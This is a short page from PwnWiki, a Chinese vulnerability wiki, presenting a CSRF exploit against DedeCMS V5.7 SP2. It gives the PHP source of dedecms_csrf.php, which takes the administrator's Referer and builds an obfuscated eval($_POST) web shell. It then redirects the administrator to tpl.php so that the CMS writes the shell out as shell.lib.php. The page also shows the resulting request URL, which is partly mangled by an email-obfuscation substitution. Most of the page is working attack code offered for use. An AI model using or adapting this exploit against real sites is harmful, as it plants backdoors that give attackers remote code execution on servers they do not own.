免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
漏洞利用
dedecms_csrf.php
的内容如下:
<?php $referer = $_SERVER'HTTP_REFERER'; $dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径 $muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.''.'\''.'c'.'\''.''.')'.';'.'?'.'>'; $exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php'; $url = $dede_login.$exp; header("location: ".$url); exit();
管理员:
由于友链中使用了header 跳转,所以结果其实是访问了
http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%email protected($_POST%27c%27);?%3E&filename=shell.lib.php
请求。
shell.lib.php:
免费、自由、人人可编辑的漏洞库--PwnWiki.com